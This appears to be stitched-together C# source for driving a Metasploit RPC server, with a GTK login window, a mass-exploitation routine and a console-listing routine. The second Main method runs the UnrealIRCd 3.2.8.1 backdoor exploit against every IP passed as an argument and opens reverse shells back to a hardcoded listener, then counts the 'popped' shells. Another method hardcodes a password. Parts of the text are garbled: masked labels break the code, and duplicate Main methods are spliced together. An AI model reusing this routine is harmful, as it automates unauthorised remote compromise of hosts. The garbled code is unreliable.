public MainWindow()
: base(Gtk.WindowType.Toplevel)
{
this.Resize (600, 100);
this.Title = "metafang";
_main = new VBox ();
HBox title = new HBox ();
title.PackStart (new Label ("Login to your Metasploit RPC instance to begin"), true, true, 0);
_main.PackStart (title, true, true, 0);
HBox loginInfo = new HBox ();
loginInfo.PackStart (new Label ("Host:"), false, false, 20);
Entry hostEntry = new Entry ();
loginInfo.PackStart (hostEntry, false, false, 0);
loginInfo.PackStart (new Label ("User:"******"Pass:"******"Login");
login.Clicked += (object sender, EventArgs e) => {
try {
//Console.WriteLine ("Creating session");
_session = new MetasploitSession (userEntry.Text, passEntry.Text, hostEntry.Text);
//Console.WriteLine ("Creating manager and getting current list of payloads");
_manager = new MetasploitManager (_session);
_payloads = _manager.GetPayloads ();
BuildWorkspace ();
} catch {
MessageDialog md = new MessageDialog (this,
DialogFlags.DestroyWithParent,
MessageType.Error,
ButtonsType.Close, "Authentication failed. Please ensure your credentials and API URL are correct.");
md.Run ();
md.Destroy ();
}
};
HBox loginBox = new HBox ();
loginBox.PackStart (login, false, false, 300);
_main.PackStart (loginBox, true, true, 0);
_main.ShowAll ();
this.Add (_main);
}
public static void Main(string[] args)
{
using (MetasploitSession session = new MetasploitSession("user", "pass", "http://127.0.0.1:55553/api")) {
if (string.IsNullOrEmpty (session.Token))
throw new Exception ("Login failed. Check credentials");
using (MetasploitManager manager = new MetasploitManager(session)) {
Dictionary<string, object> response = null;
Dictionary<string, object> blah = new Dictionary<string, object> ();
blah ["ExitOnSession"] = "false";
blah ["PAYLOAD"] = "cmd/unix/reverse";
blah ["LHOST"] = "192.168.1.31";
blah ["LPORT"] = "4444";
response = manager.ExecuteModule ("exploit", "multi/handler", blah);
object jobID = response ["job_id"];
foreach (string ip in args) {
Dictionary<string, object> opts = new Dictionary<string, object> ();
opts ["RHOST"] = ip;
opts ["DisablePayloadHandler"] = "true";
opts ["LHOST"] = "192.168.1.31";
opts ["LPORT"] = "4444";
opts ["PAYLOAD"] = "cmd/unix/reverse";
response = manager.ExecuteModule ("exploit", "unix/irc/unreal_ircd_3281_backdoor", opts);
}
response = manager.ListJobs();
List<object> vals = new List<object>(response.Values);
while (vals.Contains((object)"Exploit: unix/irc/unreal_ircd_3281_backdoor")) {
Console.WriteLine ("Waiting");
System.Threading.Thread.Sleep (6000);
response = manager.ListJobs();
vals = new List<object> (response.Values);
}
response = manager.StopJob(jobID.ToString());
response = manager.ListSessions ();
Console.WriteLine ("I popped " + response.Count + " shells. Awesome.");
// foreach (var pair in response) {
// string id = pair.Key;
// Dictionary<string, object> dict = (Dictionary<string, object>)pair.Value;
// if ((dict["type"] as string) == "shell") {
// response = manager.WriteToSessionShell(id, "id\n");
// System.Threading.Thread.Sleep(6000);
// response = manager.ReadSessionShell(id);
//
// Console.WriteLine(response["data"]);
//
// //manager.StopSession(id);
// }
// }
Dictionary<string, object> bl = manager.GetModuleCompatibleSessions("multi/general/execute");
Console.WriteLine("fdsa");
}
}
}
public static void Main(string[] args)
{
using (MetasploitSession session = new MetasploitSession("metasploit", "P[.=~v5Y", "https://192.168.1.141:3790/api/1.1"))
{
if (string.IsNullOrEmpty(session.Token))
throw new Exception("Login failed. Check credentials");
using (MetasploitManager manager = new MetasploitManager(session))
{
System.Text.Encoding enc = System.Text.Encoding.UTF8;
Dictionary<object, object> modules = manager.GetCoreModuleStats();
Console.WriteLine("Module stats:");
foreach (KeyValuePair<object, object> pair in modules)
Console.WriteLine(pair.Key + ": " + pair.Value );
Dictionary<object, object> version = manager.GetCoreVersionInformation();
Console.WriteLine("\n\nVersion information:");
foreach (KeyValuePair<object, object> pair in version)
Console.WriteLine(pair.Key + ": " + pair.Value);
Console.WriteLine("\n\nCreating console....");
Dictionary<object, object> consoleResponse = manager.CreateConsole();
foreach (KeyValuePair<object, object> pair in consoleResponse)
Console.WriteLine(pair.Key + ": " + pair.Value);
string consoleID = consoleResponse[((object)"id")] as string;
Console.WriteLine("\n\nConsole created, getting list of consoles...");
Dictionary<object, object> consoleList = manager.ListConsoles();
foreach (KeyValuePair<object, object> pair in consoleList)
{
Console.WriteLine("\n" + pair.Key + ":");
foreach (object obj in (pair.Value as object[]))
{
//each obj is a Dictionary<object, object> in this response
foreach (KeyValuePair<object, object> p in obj as Dictionary<object, object>)
{
string pkType = p.Key.GetType().ToString();
string pvType = p.Value.GetType().ToString();
if (p.Value.GetType() == typeof(byte[]))
Console.WriteLine(enc.GetString(p.Key as byte[]) + ": " + enc.GetString(p.Value as byte[]));
else if (p.Value.GetType() == typeof(bool))
Console.WriteLine(enc.GetString(p.Key as byte[]) + ": " + ((bool)p.Value).ToString());
else
throw new Exception(pkType + ": " + pvType);
}
}
}
Console.WriteLine("\n\nDestroying our console: " + consoleID);
Dictionary<object, object> destroyResponse = manager.DestroyConsole(consoleID);
foreach (KeyValuePair<object, object> pair in destroyResponse)
Console.WriteLine(pair.Key + ": " + pair.Value);
if (destroyResponse.ContainsKey((object)"result") && ((string)destroyResponse[((object)"result")]) == "success")
Console.WriteLine("Destroyed.");
}
}
}
